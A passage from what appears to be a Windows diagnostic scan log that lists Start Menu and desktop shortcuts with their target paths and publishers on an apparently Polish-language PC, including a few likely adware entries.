pliku)
Shortcut: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.WindowsCalculator_8wekyb3d8bbwe\App.lnk -> Tile and icon assets
Shortcut: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.WindowsAlarms_8wekyb3d8bbwe\App.lnk -> Tile and icon assets
Shortcut: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.SkypeApp_kzf8qxf38zg5c\App.lnk -> Tile and icon assets
Shortcut: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.Reader_8wekyb3d8bbwe\Microsoft.Reader.lnk -> Tile and icon assets
Shortcut: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.HelpAndTips_8wekyb3d8bbwe\HelpAndTips.lnk -> Tile and icon assets
Shortcut: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.BingWeather_8wekyb3d8bbwe\App.lnk -> Tile and icon assets
Shortcut: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.BingTravel_8wekyb3d8bbwe\AppexTravel.lnk -> Tile and icon assets
Shortcut: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.BingSports_8wekyb3d8bbwe\AppexSports.lnk -> Tile and icon assets
Shortcut: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.BingNews_8wekyb3d8bbwe\AppexNews.lnk -> Tile and icon assets
Shortcut: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.BingMaps_8wekyb3d8bbwe\AppexMaps.lnk -> Tile and icon assets
Shortcut: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.BingHealthAndFitness_8wekyb3d8bbwe\AppexHealthAndFitness.lnk -> Tile and icon assets
Shortcut: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.BingFoodAndDrink_8wekyb3d8bbwe\AppexFoodAndDrink.lnk -> Tile and icon assets
Shortcut: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.BingFinance_8wekyb3d8bbwe\AppexFinance.lnk -> Tile and icon assets
Shortcut: C:\Users\Admin_KTR\Desktop\xxx_10.21.64.199.lnk -> \\10.21.64.199\xxx
Shortcut: C:\Users\Admin_KTR\Desktop\ZAPIECZETUJ-AUDIT.lnk -> C:\ProgramData\KTR\startsysprep-AUDIT.cmd ()
Shortcut: C:\Users\Admin_KTR\Desktop\ZAPIECZETUJ-OOBE.lnk -> C:\ProgramData\KTR\startsysprep-OOBE.cmd ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\WinRAR.lnk -> C:\Program Files\WinRAR\WinRAR.exe (Alexander Roshal)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk -> C:\Windows\Installer\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\SC_Reader.ico (Flexera Software LLC)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avast SafeZone Browser.lnk -> C:\Program Files\AVAST Software\SZBrowser\launcher.exe (Avast Software)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC TuneUp 2015.lnk -> C:\Program Files (x86)\AVG\AVG PC TuneUp\Integrator.exe (AVG Technologies)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Camera.lnk -> C:\Windows\Camera\Camera.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CDBurnerXP.lnk -> C:\Program Files\CDBurnerXP\cdbxpp.exe (Canneverbe Limited)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Desktop.lnk -> C:\Windows\System32\imageres.dll (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FileManager.lnk -> C:\Windows\FileManager\FileManager.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GIMP 2.lnk -> C:\Program Files\GIMP 2\bin\gimp-2.8.exe (Spencer Kimball, Peter Mattis and the GIMP Development Team)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Immersive Control Panel.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PhotosApp.lnk -> C:\Windows\FileManager\PhotosApp.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Pro Evolution Soccer 2015.lnk -> F:\Pro Evolution Soccer 2015\PES2015.exe (Konami Digital Entertainment Co., Ltd.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Store.lnk -> C:\Windows\WinStore\WinStore.htm ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR\Co nowego w ostatniej wersji.lnk -> C:\Program Files\WinRAR\CoNowego.txt ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR\Podręcznik RARa dla konsoli.lnk -> C:\Program Files\WinRAR\Rar.txt ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR\Pomoc WinRARa.lnk -> C:\Program Files\WinRAR\WinRAR.chm ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR\WinRAR.lnk -> C:\Program Files\WinRAR\WinRAR.exe (Alexander Roshal)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Winamp\Co nowego.lnk -> F:\Winamp\whatsnew.txt ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Winamp\Odinstaluj Winampa.lnk -> F:\Winamp\UninstWA.exe (Nullsoft, Inc.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Winamp\Winamp.lnk -> F:\Winamp\winamp.exe (Nullsoft, Inc.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoLAN\Documentation.lnk -> F:\VLC\Documentation.url ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoLAN\Release Notes.lnk -> F:\VLC\NEWS.txt ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoLAN\VideoLAN Website.lnk -> F:\VLC\VideoLAN Website.url ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoLAN\VLC media player.lnk -> F:\VLC\vlc.exe (VideoLAN)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Unigine\Valley Benchmark 1.0\Uninstall.lnk -> C:\Program Files (x86)\Unigine\Valley Benchmark 1.0\unins000.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Unigine\Valley Benchmark 1.0\User manual.lnk -> C:\Program Files (x86)\Unigine\Valley Benchmark 1.0\documentation\User_Manual.pdf ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Unigine\Heaven Benchmark 4.0\Uninstall.lnk -> C:\Program Files (x86)\Unigine\Heaven Benchmark 4.0\unins000.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Unigine\Heaven Benchmark 4.0\User manual.lnk -> C:\Program Files (x86)\Unigine\Heaven Benchmark 4.0\documentation\User_Manual.pdf ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tlen.pl\Komunikator Tlen.pl.lnk -> F:\Tlen7\tlen7.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tlen.pl\Odinstaluj.lnk -> F:\Tlen7\Uninstall.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\Windows Easy Transfer.lnk -> C:\Windows\System32\migwiz\migwiz.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\Windows PowerShell.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.11.163\SSScheduler.exe (McAfee, Inc.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SopCast\SopCast web site.lnk -> C:\Program Files (x86)\SopCast\SopCast web site.url ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SopCast\SopCast.lnk -> C:\Program Files (x86)\SopCast\SopCast.exe (http://www.sopcast.com)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SopCast\Uninstall.lnk -> C:\Program Files (x86)\SopCast\uninst.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Smart File Advisor\Smart File Advisor Updater.lnk -> C:\Program Files (x86)\Smart File Advisor\SFAUpdater.exe (Brak pliku)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Smart File Advisor\Startup Application Checker.lnk -> C:\Program Files (x86)\Smart File Advisor\StartupChecker.exe (Filefacts.net)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype\Skype.lnk -> C:\Program Files (x86)\Skype\Phone\Skype.exe (Skype Technologies S.A.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ScreenShot\ScreenShot.lnk -> C:\Program Files (x86)\ScreenShot\ScreenShot.exe (Filseclab Corporation Limited)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ScreenShot\SSInst.lnk -> C:\Program Files (x86)\ScreenShot\SSInst.exe (Filseclab Corporation Limited)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ScanSpeeder 1.5.4\ScanSpeeder Help.lnk -> C:\Program Files (x86)\ScanSpeeder\apphelp.chm ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ScanSpeeder 1.5.4\ScanSpeeder.lnk -> C:\Program Files (x86)\ScanSpeeder\ScanSpeeder.exe (Nitro Logic)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Picasa 3\Odinstaluj.lnk -> C:\Program Files (x86)\Google\Picasa3\Uninstall.exe (Google)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Picasa 3\Picasa 3.lnk -> C:\Program Files (x86)\Google\Picasa3\Picasa3.exe (Google Inc.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PhotoScape\PhotoScape.lnk -> C:\Program Files (x86)\PhotoScape\PhotoScape.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PhotoScape\Uninstall PhotoScape.lnk -> C:\Program Files (x86)\PhotoScape\uninstall.exe (Mooii)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Oracle VM VirtualBox\License (English).lnk -> C:\Program Files\Oracle\VirtualBox\License_en_US.rtf ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Oracle VM VirtualBox\Oracle VM VirtualBox.lnk -> C:\Program Files\Oracle\VirtualBox\VirtualBox.exe (Oracle Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Oracle VM VirtualBox\User manual (CHM, English).lnk -> C:\Program Files\Oracle\VirtualBox\VirtualBox.chm ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Oracle VM VirtualBox\User manual (PDF, English).lnk -> C:\Program Files\Oracle\VirtualBox\doc\UserManual.pdf ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MSI\MSI GamingApp\Deinstalacja programu MSI GamingApp.lnk -> C:\Program Files (x86)\MSI\MSI GamingApp\unins000.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MSI\MSI GamingApp\MSI GamingApp.lnk -> C:\Program Files (x86)\MSI\MSI GamingApp\MSIGamingApp.exe (Micro-Star International Co., Ltd.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\mIRC\IRCIntro Help.lnk -> C:\Program Files (x86)\mIRC\ircintro.chm ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\mIRC\mIRC Help.lnk -> C:\Program Files (x86)\mIRC\mirc.chm ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\mIRC\mIRC.lnk -> C:\Users\Adam\Desktop\mirc.exe (mIRC Co. Ltd.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\mIRC\Readme.txt.lnk -> C:\Program Files (x86)\mIRC\readme.txt ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\mIRC\Versions.txt.lnk -> C:\Program Files (x86)\mIRC\versions.txt ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight\Microsoft Silverlight.lnk -> C:\Program Files\Microsoft Silverlight\5.1.40416.0\Silverlight.Configuration.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Microsoft Office Access 2007.lnk -> C:\Windows\Installer\{90120000-0030-0000-0000-0000000FF1CE}\accicons.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Microsoft Office Excel 2007.lnk -> C:\Windows\Installer\{90120000-0030-0000-0000-0000000FF1CE}\xlicons.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Microsoft Office Groove 2007.lnk -> C:\Windows\Installer\{90120000-0030-0000-0000-0000000FF1CE}\GrooveIcon.ico ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Microsoft Office InfoPath 2007.lnk -> C:\Windows\Installer\{90120000-0030-0000-0000-0000000FF1CE}\inficon.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Microsoft Office OneNote 2007.lnk -> C:\Windows\Installer\{90120000-0030-0000-0000-0000000FF1CE}\joticon.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Microsoft Office Outlook 2007.lnk -> C:\Windows\Installer\{90120000-0030-0000-0000-0000000FF1CE}\outicon.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Microsoft Office PowerPoint 2007.lnk -> C:\Windows\Installer\{90120000-0030-0000-0000-0000000FF1CE}\pptico.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Microsoft Office Publisher 2007.lnk -> C:\Windows\Installer\{90120000-0030-0000-0000-0000000FF1CE}\pubs.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Microsoft Office Word 2007.lnk -> C:\Windows\Installer\{90120000-0030-0000-0000-0000000FF1CE}\wordicon.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Narzędzia Microsoft Office\Certyfikat cyfrowy dla projektów VBA.lnk -> C:\Windows\Installer\{90120000-0030-0000-0000-0000000FF1CE}\misc.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Narzędzia Microsoft Office\Diagnostyka pakietu Microsoft Office.lnk -> C:\Windows\Installer\{90120000-0030-0000-0000-0000000FF1CE}\misc.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Narzędzia Microsoft Office\Microsoft Clip Organizer.lnk -> C:\Windows\Installer\{90120000-0030-0000-0000-0000000FF1CE}\cagicon.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Narzędzia Microsoft Office\Microsoft Office 2007 Ustawienia języka.lnk -> C:\Windows\Installer\{90120000-0030-0000-0000-0000000FF1CE}\misc.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Narzędzia Microsoft Office\Microsoft Office Picture Manager.lnk -> C:\Windows\Installer\{90120000-0030-0000-0000-0000000FF1CE}\oisicon.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee\McAfee Internet Security.lnk -> C:\Program Files\McAfee.com\Agent\mcagent.exe (Brak pliku)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lenovo\REACHit\REACHit.lnk -> C:\Program Files (x86)\Lenovo\REACHit\REACHitAgent.exe (Lenovo)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Codec Tweak Tool.lnk -> C:\Program Files (x86)\K-Lite Codec Pack\Tools\CodecTweakTool.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Uninstall\Uninstall K-Lite Codec Pack.lnk -> C:\Program Files (x86)\K-Lite Codec Pack\unins000.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java\Configure Java.lnk -> C:\Program Files (x86)\Java\jre1.8.0_121\bin\javacpl.exe (Oracle Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ipla\Deinstalator.lnk -> C:\Program Files (x86)\ipla\uninst.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ipla\ipla.lnk -> C:\Program Files (x86)\ipla\ipla.exe (Cyfrowy Polsat S.A.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ipla\Pomoc.lnk -> C:\Program Files (x86)\ipla\Pomoc.url ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ipla\Strona Domowa.lnk -> C:\Program Files (x86)\ipla\ipla.url ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Intel\Intel(R) Rapid Storage Technology.lnk -> C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorUI.exe (Intel Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Intel\Intel(R) Smart Connect Technology.lnk -> C:\Program Files\Intel\Intel(R) Smart Connect Technology Agent\ISCTModernUI.exe (Intel Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HD Tune\HD Tune Manual.lnk -> C:\Program Files (x86)\HD Tune\hdtune.html ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HD Tune\HD Tune on the Web.lnk -> C:\Program Files (x86)\HD Tune\HDTune.url ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HD Tune\HD Tune.lnk -> C:\Program Files (x86)\HD Tune\HDTune.exe (EFD Software)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HD Tune\Uninstall HD Tune.lnk -> C:\Program Files (x86)\HD Tune\unins000.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Earth\Start Google Earth.lnk -> C:\Program Files (x86)\Google\Google Earth\client\googleearth.exe (Google)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Drive\Google Drive.lnk -> C:\Program Files (x86)\Google\Drive\googledrivesync.exe (Google)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EaseUS Todo Backup Free 8.2\Deinstalacja programu EaseUS Todo Backup Free 8.2 .lnk -> C:\Program Files (x86)\EaseUS\Todo Backup\unins000.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EaseUS Todo Backup Free 8.2\EaseUS Todo Backup Free 8.2  .lnk -> C:\Program Files (x86)\EaseUS\Todo Backup\bin\Loader.exe (CHENGDU YIWO Tech Development Co., Ltd)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EaseUS Partition Master 10.2\Deinstalacja programu EaseUS Partition Master 10.2.lnk -> C:\Program Files (x86)\EaseUS\EaseUS Partition Master 10.2\unins000.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EaseUS Partition Master 10.2\EaseUS Partition Master 10.2.lnk -> C:\Program Files (x86)\EaseUS\EaseUS Partition Master 10.2\bin\EPMStartLoader.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Deluxe Ski Jump 4\Deluxe Ski Jump 4.lnk -> F:\Deluxe Ski Jump 4\DSJ4.exe (Mediamond Tmi)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Deluxe Ski Jump 4\DSJ4 Setup.lnk -> F:\Deluxe Ski Jump 4\Setup.exe (Mediamond Tmi)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Deluxe Ski Jump 4\Uninstall DSJ4.lnk -> F:\Deluxe Ski Jump 4\Uninstall\unins000.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Deluxe Ski Jump 4\Readme\English.lnk -> F:\Deluxe Ski Jump 4\Readme\English.txt ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Deluxe Ski Jump 4\Readme\Finnish.lnk -> F:\Deluxe Ski Jump 4\Readme\Finnish.txt ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Deluxe Ski Jump 4\Readme\German.lnk -> F:\Deluxe Ski Jump 4\Readme\German.txt ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Deluxe Ski Jump 4\Readme\Norwegian.lnk -> F:\Deluxe Ski Jump 4\Readme\Norwegian.txt ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Deluxe Ski Jump 4\Readme\Polish.lnk -> F:\Deluxe Ski Jump 4\Readme\Polish.txt ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Deluxe Ski Jump 4\Readme\Slovenian.lnk -> F:\Deluxe Ski Jump 4\Readme\Slovenian.txt ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Deluxe Ski Jump 4\Links\Buy Full Version.lnk -> F:\Deluxe Ski Jump 4\Links\Buy Full Version.url ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Deluxe Ski Jump 4\Links\Deluxe Ski Jump 4.lnk -> F:\Deluxe Ski Jump 4\Links\Deluxe Ski Jump 4.url ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Deluxe Ski Jump 4\Links\Mediamond Tmi.lnk -> F:\Deluxe Ski Jump 4\Links\Mediamond Tmi.url ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Debugging Tools for Windows (x86)\Debugging Help.lnk -> C:\Program Files (x86)\Debugging Tools for Windows (x86)\debugger.chm ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Debugging Tools for Windows (x86)\Global Flags.lnk -> C:\Program Files (x86)\Debugging Tools for Windows (x86)\gflags.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Debugging Tools for Windows (x86)\Release Notes.lnk -> C:\Program Files (x86)\Debugging Tools for Windows (x86)\relnotes.txt ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Debugging Tools for Windows (x86)\WinDbg.lnk -> C:\Program Files (x86)\Debugging Tools for Windows (x86)\windbg.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DAEMON Tools Lite\DAEMON Tools Lite.lnk -> C:\Program Files\DAEMON Tools Lite\DTLite.exe (Disc Soft Ltd)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CPUID\HWMonitor\HWMonitor.lnk -> C:\Program Files\CPUID\HWMonitor\HWMonitor.exe (CPUID)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CPUID\HWMonitor\Uninstall HWMonitor.lnk -> C:\Program Files\CPUID\HWMonitor\unins000.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner\CCleaner.lnk -> C:\Program Files\CCleaner\CCleaner64.exe (Piriform Ltd)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVAST Software\Avast Free Antivirus.lnk -> C:\Program Files\AVAST Software\Avast\AvastUI.exe (AVAST Software)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Settings\AMD Settings.lnk -> C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe (Advanced Micro Devices, Inc.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Problem Report Wizard\Run AMD Problem Report Wizard.lnk -> C:\Program Files\AMD\amdprw.exe (Brak pliku)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Gaming Evolved\AMD Gaming Evolved.lnk -> C:\Program Files (x86)\Raptr\raptrstub.exe (Raptr, Inc)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Alcohol 120%\A.C.I.D. Wizard.lnk -> C:\Program Files (x86)\Alcohol Soft\Alcohol 120\ACID.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Alcohol 120%\Alcohol 120%.lnk -> C:\Program Files (x86)\Alcohol Soft\Alcohol 120\Alcohol.exe (Alcohol Soft Development Team)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Alcohol 120%\Alcohol Command Launcher.lnk -> C:\Program Files (x86)\Alcohol Soft\Alcohol 120\AxCmd.exe (Alcohol Soft Development Team)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Alcohol 120%\Data-Type Analyzer.lnk -> C:\Program Files (x86)\Alcohol Soft\Alcohol 120\AxDTA.exe (Alcohol Soft Development Team)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Alcohol 120%\Uninstall Alcohol 120%.lnk -> C:\Program Files (x86)\Alcohol Soft\Alcohol 120\uninst.exe (Alcohol Soft Development Team)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Component Services.lnk -> C:\Windows\System32\comexp.msc ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\dfrgui.lnk -> C:\Windows\System32\dfrgui.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Disk Cleanup.lnk -> C:\Windows\System32\cleanmgr.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\iSCSI Initiator.lnk -> C:\Windows\System32\iscsicpl.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Memory Diagnostics Tool.lnk -> C:\Windows\System32\MdSched.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\ODBC Data Sources (32-bit).lnk -> C:\Windows\SysWOW64\odbcad32.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\ODBC Data Sources (64-bit).lnk -> C:\Windows\System32\odbcad32.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\services.lnk -> C:\Windows\System32\services.msc ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\System Configuration.lnk -> C:\Windows\System32\msconfig.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\System Information.lnk -> C:\Windows\System32\msinfo32.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Windows Firewall with Advanced Security.lnk -> C:\Windows\System32\WF.msc ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Windows PowerShell (x86).lnk -> C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Windows PowerShell ISE (x86).lnk -> C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell_ISE.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Windows PowerShell ISE.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell_ISE.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ACD Systems\ACD FotoCanvas 3.0.lnk -> C:\Windows\Installer\{271B64EE-3E1B-4381-A8FE-012390050492}\FotoCanvasProgramMen_FD88D5011F0A4DA4A13A6437411EE0C3.exe (InstallShield Software Corp.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ACD Systems\ACD FotoSlate 3.0.lnk -> C:\Windows\Installer\{271B64EE-3E1B-4381-A8FE-012390050492}\FotoSlateProgramFile_FD88D5011F0A4DA4A13A6437411EE0C3.exe (InstallShield Software Corp.)
